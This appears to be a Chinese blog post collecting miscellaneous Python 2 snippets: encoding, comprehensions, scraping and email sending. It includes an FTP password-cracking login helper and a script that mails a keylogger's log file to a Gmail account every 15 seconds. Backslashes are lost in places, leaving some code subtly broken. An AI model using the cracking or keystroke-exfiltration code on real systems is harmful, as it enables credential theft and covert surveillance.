1.Python的ftplib模块
先看实例:
def ftp_anon(host):
try:
print 'n[+] 测试匿名登陆……n'
ftp = ftplib.FTP()
ftp.connect(host, 21, 10)
ftp.login()
ftp.retrlines('LIST')
ftp.quit()
print 'n[+] 匿名登陆成功……'
except ftplib.all_errors:
print 'n[-] 匿名登陆失败……'
def ftp_crack(host, user, pwd):
try:
ftp = ftplib.FTP()
ftp.connect(host, 21, 10)
ftp.login(user, pwd)
ftp.retrlines('LIST')
ftp.quit()
print 'n[+] 登陆成功,用户名:' + user + ' 密码:' + pwd
except ftplib.all_errors:
pass
ftp = ftplib.FTP() #返回FTP类的一个实例
ftp.connect(host, 21, 10) #连接host的21端口,取timeout为10
ftp.retrlines(‘LIST’) #以ASCII模式返回目录/文件列表
官方文档:20.8. ftplib — FTP protocol client — Python 2.7.8 documentation
2.Python的socket模块的简单介绍
一、通过gethostbyname获取域名对应的IP(s)
host = socket.gethostbyname('ixyzero.com')
In [10]: socket.gethostbyname?
Type: builtin_function_or_method
String form: <built-in function gethostbyname>
Docstring:
gethostbyname(host) -> address
Return the IP address (a string of the form '255.255.255.255') for a host.
In [11]: socket.gethostbyname_ex?
Type: builtin_function_or_method
String form: <built-in function gethostbyname_ex>
Docstring:
gethostbyname_ex(host) -> (name, aliaslist, addresslist)
Return the true host name, a list of aliases, and a list of IP addresses,
for a host. The host argument is a string giving a host name or IP number.
In [12]: baidu = socket.gethostbyname('www.baidu.com')
In [13]: type(baidu)
Out[13]: str
In [14]: print baidu
220.181.112.244
In [15]: baidu2 = socket.gethostbyname_ex('www.baidu.com')
In [16]: type(baidu2)
Out[16]: tuple
In [17]: print baidu2
('www.a.shifen.com', ['www.baidu.com'], ['220.181.112.244', '220.181.111.188'])
In [18]: for item in baidu2[2]: print item
220.181.112.244
220.181.111.188
import socket
result = socket.getaddrinfo('www.baidu.com', None, 0, socket.SOCK_STREAM)
counter = 1
for item in result:
print "%-2d: %s" % (counter, item[4])
counter += 1
3.Python的字典去重/计数&排序
def get_counts(sequence):
counts = {}
for x in sequence:
if x in counts:
counts[x] += 1
else:
counts[x] = 1
return counts
####
from collections import defaultdict
def get_counts2(sequence):
counts = defaultdict(int)
for x in sequence:
counts[x] += 1
return counts
####
dict_str = {'blue':'[email protected]', 'allen':'[email protected]', 'sophia':'[email protected]', 'ceen':'[email protected]'}
print dict_str
# 按照key进行排序
print sorted(dict_str.items(), key=lambda d:d[0])
# 按照value进行排序
print sorted(dict_str.items(), key=lambda d:d[1])
for key, value in dict_str.items():
print key, value
4.Python中函数亦为对象
####函数亦为对象####
states = [' Alabama ', 'Georgia!', 'Georgia', 'georgia', 'south carolina##', ' West virginia?', 'New York .', 'China.', 'Beijing...']
import re
def clean_stings(strings):
result = []
for value in strings:
value = value.strip()
value = re.sub('[!#?]', '', value)
value = value.title()
result.append(value)
return result
clean_stings(states)
def remove_punctuation(value):
return re.sub('[!?#]', '', value)
clean_ops = [str.strip, remove_punctuation, str.title]
def clean_stings2(strings, ops):
result = []
for value in strings:
for function in ops:
value = function(value)
result.append(value)
return result
clean_stings2(states, clean_ops)
map(remove_punctuation, states) #内置的map函数有点牛逼啊!
5.Python中的推导式{超赞!}
#列表推导式
strings = ['a', 'as', 'a', 'bad', 'boy', 'Python']
[x.upper() for x in strings]
[x.upper() for x in strings if len(x)>2]
#字典推导式
dict_map = {key:value for key, value in enumerate(strings)}
dict_map = dict((value, key) for key, value in enumerate(strings))
def file_2_dict(fileName):
return {k.strip():v.strip() for k, v in (l.split('=') for l in open(fileName))}
#集合推导式
set_map = {key for key in strings}
#嵌套列表推导式
all_data = [['Tom', 'Jerry', 'Lily', 'Lucy', 'Hello,world', 'Jefferson', 'Steven', 'Joe', 'Bill'], ['Susie', 'Cookie', 'Qunar', 'Baidu', 'Notepad', 'Apple', 'Alibaba']]
names_of_interset = []
for names in all_data:
enough = [name for name in names if name.count('e')>2]
names_of_interset.extend(enough)
names2 = [name for names in all_data for name in names if name.count('e') > 2]
names3 = [name for names in all_data for name in names]
6.Python的encode和decode方法
先来一个Windows下的封装函数,避免出现乱码:
import sys
def encode(s):
return s.decode('utf-8').encode(sys.stdout.encoding, 'ignore')
该函数的功能,就是先将给定的字符串s进行utf8解码,然后再使用系统终端默认字符编码方式对字符串进行编码,对于Windows下的终端显示效果很好;
Python内建的encode()方法以 encoding 指定的编码格式编码字符串。errors参数可以指定不同的错误处理方案。
语法:str.encode(encoding=’UTF-8′,errors=’strict’)
encoding — 要使用的编码,如”UTF-8″。
errors — 设置不同错误的处理方案。默认为 ‘strict’,意为编码错误引起一个UnicodeError。 其他可能得值有 ‘ignore’, ‘replace’, ‘xmlcharrefreplace’, ‘backslashreplace’ 以及通过 codecs.register_error() 注册的任何值。
一般在和字符编码相关的Python脚本中,经常需要在开头添加:
import sys
reload(sys)
sys.setdefaultencoding('utf8')
因为在Python2.5及以后的版本中,初始化之后会删除 sys.setdefaultencoding 这个方法,我们需要重新载入reload(sys),然后手动指定默认编码方式。
In [26]: import sys
In [27]: print sys.stdout.encoding
cp936
In [28]: a = 'string...'
In [29]: a.encode?
Type: builtin_function_or_method
String form: <built-in method encode of str object at 0x033E41C0>
Docstring:
S.encode([encoding[,errors]]) -> object
Encodes S using the codec registered for encoding. encoding defaults
to the default encoding. errors may be given to set a different error
handling scheme. Default is 'strict' meaning that encoding errors raise
a UnicodeEncodeError. Other possible values are 'ignore', 'replace' and
'xmlcharrefreplace' as well as any other name registered with
codecs.register_error that is able to handle UnicodeEncodeErrors.
encoding默认将s编码为系统默认编码格式,默认的strict可能会导致UnicodeEncodeError错误
In [30]: s = '中国'
In [31]: print s
涓浗
In [32]: type(s)
Out[32]: str
In [33]: repr(s)
Out[33]: "'\xe4\xb8\xad\xe5\x9b\xbd'"
In [34]: s.en
s.encode s.endswith
In [34]: s.encode('gb2312')
---------------------------------------------------------------------------
UnicodeDecodeError Traceback (most recent call last)
<ipython-input-34-d73c576b1830> in <module>()
----> 1 s.encode('gb2312')
UnicodeDecodeError: 'ascii' codec can't decode byte 0xe4 in position 0: ordinal not in range(128)
'''
这里抛出异常的原因在于:Python 会自动的先将 s 解码为 unicode ,然后再编码成 gb2312。因为解码是python自动进行的,我们没有指明解码方式,python 就会使用 sys.defaultencoding 指明的方式来解码。很多情况下 sys.defaultencoding 是 ASCII,如果 s 不是这个类型就会出错。
'''
In [35]: s.decode('utf-8').encode('gb2312')
Out[35]: 'xd6xd0xb9xfa'
In [36]: sys.stdout.encoding
Out[36]: 'cp936'
In [37]: s.decode('utf-8')
Out[37]: u'u4e2du56fd'
In [38]: s.decode('utf-8').encode('utf-8')
Out[38]: 'xe4xb8xadxe5x9bxbd'
In [39]: s.decode?
Type: builtin_function_or_method
String form: <built-in method decode of str object at 0x034F39C0>
Docstring:
S.decode([encoding[,errors]]) -> object
Decodes S using the codec registered for encoding. encoding defaults
to the default encoding. errors may be given to set a different error
handling scheme. Default is 'strict' meaning that encoding errors raise
a UnicodeDecodeError. Other possible values are 'ignore' and 'replace'
as well as any other name registered with codecs.register_error that is
able to handle UnicodeDecodeErrors.
当我们没有指明解码方式时,Python 就会使用 sys.defaultencoding 指明的方式来解码。很多情况下 sys.defaultencoding 是 ASCII,如果 s 不是这个类型就会出错。
参考链接:
7.Python的字符串split函数改进版
def tsplit(string, delimiters):
"""Behaves str.split but supports multiple delimiters."""
delimiters = tuple(delimiters)
stack = [string,]
for delimiter in delimiters:
for i, substring in enumerate(stack):
substack = substring.split(delimiter)
stack.pop(i)
for j, _substring in enumerate(substack):
stack.insert(i+j, _substring)
return stack
####
s = 'thing1,thing2/thing3-thing4'
print tsplit(s, (',', '/', '-')) # ['thing1', 'thing2', 'thing3', 'thing4']
print tsplit('你好,Python,yoyo-checknow. Justdoit!', (',', ',', '.')) # ['xe4xbdxa0xe5xa5xbd', 'Python', 'yoyo-checknow', ' Justdoit!']
8.Python下载OSChina的代码
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import re, urllib, sys, time
def main():
#伪装浏览器
headers = ('User-Agent','Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0)')
opener = urllib.URLopener()
opener.addheaders = [headers]
#循环列表页
for page in range(1,29):
url = "http://www.oschina.net/code/list/7/python?show=time&p=" + str(page)
data = opener.open(url).read()
data = data.decode('UTF8')
#取出文章的url地址
url_list = re.findall(re.compile(r'<a href="(.*)" target="_blank" title='), data)
#取出文章名称
post_list = re.findall(re.compile(r'"_blank" title="(.*)">'), data)
for i in range(len(url_list)):
reload(sys)
sys.setdefaultencoding('utf-8')
post_data = opener.open(url_list[i]).read()
post_data = post_data.decode('UTF8')
#由于刚入门,对re不是特别了解,请教了大拿后给的一个简单的方案,替换换行为AaA,然后取出文章
x = post_data.replace('n', 'AaA')
post = re.match(r".*<pre class="brush: python; auto-links: false; ">(.*)</pre", x)
print(post_list[i])
#一开始使用的时候发现报错,因为有的文章页面没有任何代码,所以加了try。
try:
#根据文章名称命名文件
post_name = re.sub('[/:.* ]', '_', post_list[i])
f = open(r'oschina/%s.py' % post_name, 'w')
post = post.group(1).replace('AaA', 'n')
f.write(post)
f.close()
except AttributeError:
print(post_list[i] + ":null")
time.sleep(1)
print('That' all!')
if __name__ == '__main__':
main()
原文链接:python 下载oschina python代码
9.用Python发邮件
#!/usr/bin/env python
#-*- coding: utf8 -*-
'''
用于发送邮件(可以发送附件)的命令行程序
'''
import smtplib
from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart
import sys
def helpinfo():
print '''
Useage: pymail -u user@domain -p passwd -h smtp server host -t to who [-a attachment file path] [-n attachment name]
Useage: email content use . to end
-h specify smtp server host
-u which user you login the smtp server,and must with it domain
-p the password of the smtp user
-t The email recipient,multiple addresses can use ',' split
-a Add attachment
-n Secify attachment name in the email
'''
options = ['-t', '-a', '-n', '-h', '-u', '-p', '-s'] # 所有选项
argvnum = len(sys.argv) # 获取选项长度
# 检测命令行参数
for i in range(argvnum):
if ( i % 2 != 0):
if (sys.argv[i] not in options):
print 'Unknow option ', sys.argv[i] , ', Please use -h see help!'
sys.exit(3)
# 如果是-h或者没有命令行参数则显示帮助
try:
if sys.argv[1] == '-h' or len(sys.argv) == 0:
helpinfo()
except:
helpinfo()
# 检测-n参数
if ('-n' in sys.argv) and ('-a' not in sys.argv):
print 'Error:option "-n" must use after -a'
sys.exit(2)
# 下面则是获取各个参数内容
try:
tmpmailto = sys.argv[sys.argv.index('-t') + 1]
if ',' in tmpmailto:
mailto = tmpmailto.split(',')
else:
mailto = [tmpmailto,]
except ValueError:
print 'Error: need Mail Recipient'
sys.exit(1)
haveattr=True
try:
attrpath = sys.argv[sys.argv.index('-a') + 1]
try:
attrname = sys.argv[sys.argv.index('-n') +1 ]
except ValueError:
attrname = attrpath.split('/')[-1]
except:
attrname = None
haveattr = False
attrpath = None
try:
mail_host = sys.argv[sys.argv.index('-h') +1]
except ValueError:
print 'Waring: No specify smtp server use 127.0.0.1'
mail_host = '127.0.0.1'
try:
mail_useremail = sys.argv[sys.argv.index('-u') +1]
except ValueError:
print 'Waring: No specify user, use root'
mail_useremail = 'root@localhost'
try:
mail_sub = sys.argv[sys.argv.index('-s') + 1]
except:
mail_sub = 'No Subject'
mail_user = mail_useremail.split('@')[0]
mail_postfix = mail_useremail.split('@')[1]
try:
mail_pass = sys.argv[sys.argv.index('-p') +1]
except ValueError:
mail_pass = ''
# 定义邮件发送函数
def send_mail(to_list, sub, content, haveattr, attrpath, attrname):
me = mail_user + "<" + mail_user+"@"+mail_postfix +">"
# 判断是否有附件
if (haveattr):
if (not attrpath):
print 'Error : no input file of attachments'
return False
# 有附件则创建一个带附件的实例
msg = MIMEMultipart()
# 构造附件
att = MIMEText(open(attrpath, 'rb').read(),'base64', 'utf8')
att["Content-Type"] = 'application/octest-stream'
att["Content-Disposition"] = 'attachment;filename="'+ attrname +'"'
msg.attach(att)
msg.attach(MIMEText(content))
else:
# 无责创建一个文本的实例
msg = MIMEText(content)
# 邮件头
msg['Subject'] = sub
msg['From'] = me
msg['To'] = ";".join(to_list)
try:
# 发送邮件
s = smtplib.SMTP()
s.connect(mail_host)
if (mail_host != '127.0.0.1'):
s.login(mail_user, mail_pass)
s.sendmail(me, to_list, msg.as_string())
s.close()
return True
except Exception, e:
print str(e)
return False
if __name__ == '__main__':
try:
content = ''
while True:
c = raw_input('')
if c == '.':
break
content += c + 'n'
except EOFError:
for line in sys.stdin:
content += line
if send_mail(mailto, mail_sub, content, haveattr, attrpath, attrname):
print "Success"
else:
print "Failed"
#!/usr/bin/env python
#coding=utf-8
import smtplib
from email.Message import Message
import time
import optparse
import sched
schedular=sched.scheduler(time.time, time.sleep)
def sendMail(emailTo, thePasswd):
systemTime=time.strftime('%Y-%m-%d-%T',time.localtime(time.time()))
try:
fileObj=open("/root/.secret-keys.log", "r") #"/root/.secret-keys.log"是键盘记录的输出文件,根据输出文件的不同适当的修改
content=fileObj.read()
except:
print "Cannot read filen"
exit()
message = Message()
message['Subject'] = 'Log Keys' #邮件标题
message['From'] = "[email protected]"
message['To'] = emailTo
message.set_payload("当前时间"+systemTime+"n"+content) #邮件正文
msg = message.as_string()
smtp = smtplib.SMTP("smtp.gmail.com", port=587, timeout=20)
#sm.set_debuglevel(1) #开启debug模式
smtp.starttls() #使用安全连接
smtp.login(emailTo, thePasswd)
smtp.sendmail("[email protected]", emailTo, msg)
time.sleep(5) #避免邮件没有发送完成就调用了quit()
smtp.quit()
def perform(inc, emailTo, thePasswd):
schedular.enter(inc, 0, perform, (inc, emailTo, thePasswd))
sendMail(emailTo, thePasswd)
def myMain(inc, emailTo, thePasswd):
schedular.enter(0, 0, perform, (inc, emailTo, thePasswd))
schedular.run()
if __name__=="__main__":
optObj=optparse.OptionParser()
optObj.add_option("-u", dest="user", help="Gmail account")
optObj.add_option("-p", dest="passwd", help="Gmail Passwd")
(options, args)=optObj.parse_args()
emailName=options.user
emailPasswd=options.passwd
myMain(15, emailName, emailPasswd) #15表示的是相隔时间,可以根据自己的需求设定
参考链接:
10.文件合并
#!/usr/bin/env python
# coding=utf-8
import sys, os, msvcrt
def join(in_filenames, out_filename):
out_file = open(out_filename, 'w+')
err_files = []
for file in in_filenames:
try:
in_file = open(file, 'r')
out_file.write(in_file.read())
out_file.write('nn')
in_file.close()
except IOError:
print 'error joining: ', file
err_files.append(file)
out_file.close()
print 'join completed. %d file(s) missed.' % len(err_files)
print 'output file: ', out_filename
if len(err_files) > 0:
print 'missed files:'
print '--------------------------------'
for file in err_files:
print file
print '--------------------------------'
if __name__ == '__main__':
print 'scanning...'
in_filenames = []
for file in os.listdir(sys.argv[1]):
if file.lower().endswith('[all].txt'):
os.remove(file)
elif file.lower().endswith('.txt'):
in_filenames.append(file)
if len(in_filenames) > 0:
print '----------------------------------------'
print '%d part(s) in total.' % len(in_filenames)
print '----------------------------------------'
book_name = raw_input('Enter the book name: ')
print 'joining...'
join(in_filenames, book_name + '[ALL].txt')
else:
print 'nothing found.'
msvcrt.getch()
11.Python获取自身文件名的方法
有两种方法:__file__和sys.argv[0]
# coding=utf-8 import sys print __file__ print sys.argv[0] text = open(__file__).read() print text[:-1]
12.lxml模块的几个用法
from lxml.html import parse
from urllib2 import urlopen
parsed = parse(urlopen('http://finance.yahoo.com/q/op?s=AAPL+Options'))
doc = parsed.getroot()
links = doc.findall('.//a')
links[15:20]
lnk = links[2]
lnk.get('href')
lnk.text_content()
urls = [lnk.get('href') for lnk in doc.findall('.//a')]
tables = doc.findall('.//table')
rows = doc.findall('.//tr')
####
zparsed = parse(urlopen('http://ixyzero.com/blog/sitemap.html'))
zdoc = zparsed.getroot()
zurls = [lnk.get('href') for lnk in zdoc.findall('.//a')]
zlinks = zdoc.findall('.//a')
####
parseD = parse(urlopen('http://finance.yahoo.com/q/op?s=AAPL+Options'))
doc = parseD.getroot()
def _unpack(doc, kind='a'):
elts = doc.findall('.//%s' % kind)
return [val.get('href') for val in elts]
13.友链统计相关
#!/usr/bin/env python
# coding=utf-8
def affect(points, keep_ratio, ratio, power):
keep = points * keep_ratio
if ratio >= 1.: return points
return keep + (points - keep) * pow(ratio, power)
def calc_link_points(host, ul):
# simplified host 不要子域名部分!
parts = host.split('.')
if parts[-2] in ('com','edu','net','gov','org'):
host = '.'.join(host.split('.')[-3:])
else:
host = '.'.join(host.split('.')[-2:])
link_density = linktext_count = totaltext_count = 0.001
container_count = innerlink_count = 0.001
for a in ul.findAll('a'):
href = a.get('href', '')
# 内部链接
if not href or not href.lower().startswith('http') or host in href:
innerlink_count += 1
continue
# 层次太深
if urlparse(href)[2].strip('/').count('/') >= 1 or '?' in href:
continue
link_density += 1
linktext_count += len(a.text)
if '_blank' == a.get('target'):
link_density += 1
# 统计容器字数
for t in ul.recursiveChildGenerator():
if type(t) is NavigableString:
totaltext_count += len(t)
else:
container_count += 1
points = (link_density - innerlink_count) * 1000
if points < 0: return 0
points = affect(points, 0.1, linktext_count / totaltext_count, 2.)
points = affect(points, 0.1, link_density / container_count, 1.)
if points < 1000: points = 0
return points
####
def find_text(body):
candidates = []
total_links = len(body.findAll('a')) + 0.001
# 枚举文字容器
for tag in ('div', 'section', 'article', 'td', 'li', 'dd', 'dt'):
for x in body.findAll(tag):
if type(x) is not Tag: continue
points = len(x.text[:100].encode('utf8')) * 1000
points = affect(points, 0.1, 1 - len(x.findAll('a')) * 1. / total_links, 1.)
candidates.append((points, x))
# 排序,取分数最高的容器
candidates.sort(reverse = True)
if candidates:
return candidates[0][1]
return body
代码片段取自:通过友情链接进行博客Feed的搜集,你的博客收录了吗,我目前还在理解、学习的阶段。
14.利用GoogleAPI进行少量统计结果抓取
#!/usr/bin/env python
import urllib
import simplejson
query = urllib.urlencode({'q':'ixyzero.com'})
url = 'http://ajax.googleapis.com/ajax/services/search/web?v=1.0&%s'%(query)
search_results = urllib.urlopen(url)
json = simplejson.loads(search_results.read())
print(json)
results = json['responseData']['results']
print len(results)
for i in results:
print i['title'] + ": " + i['url']
《 “一些Python片段_6” 》 有 2 条评论
利用Simhash做URL去重的实现方式
http://www.noblexu.com/%E5%88%A9%E7%94%A8Simhash%E5%81%9AURL%E5%8E%BB%E9%87%8D%E7%9A%84%E5%AE%9E%E7%8E%B0%E6%96%B9%E5%BC%8F/
立即停止使用 setdefaultencoding(‘utf-8’), 以及为什么
https://blog.ernest.me/post/python-setdefaultencoding-unicode-bytes
`
最坏实践
sys.setdefaultencoding(‘utf-8’) 会导致的两个大问题
简单来说这么做将会使得一些代码行为变得怪异,而这怪异还不好修复,以一个不可见的 bug 存在着。下面我们举两个例子。
1. 编码错误
2. dictionray 行为异常
问题的根源:Python2 中的 string
Python 为了让其语法看上去简洁好用,做了很多 tricky 的事情,混淆 byte string 和 text string 就是其中一例。
在 Python 里,有三大类 string 类型,unicode(text string),str(byte string,二进制数据),basestring,是前两者的父类。
最佳实践
· 所有 text string 都应该是 unicode 类型,而不是 str,如果你在操作 text,而类型却是 str,那就是在制造 bug。
· 在需要转换的时候,显式转换。从字节解码成文本,用 var.decode(encoding),从文本编码成字节,用 var.encode(encoding)。
· 从外部读取数据时,默认它是字节,然后 decode 成需要的文本;同样的,当需要向外部发送文本时,encode 成字节再发送。
`
Why should we NOT use sys.setdefaultencoding(“utf-8”) in a py script?
https://stackoverflow.com/questions/3828723/why-should-we-not-use-sys-setdefaultencodingutf-8-in-a-py-script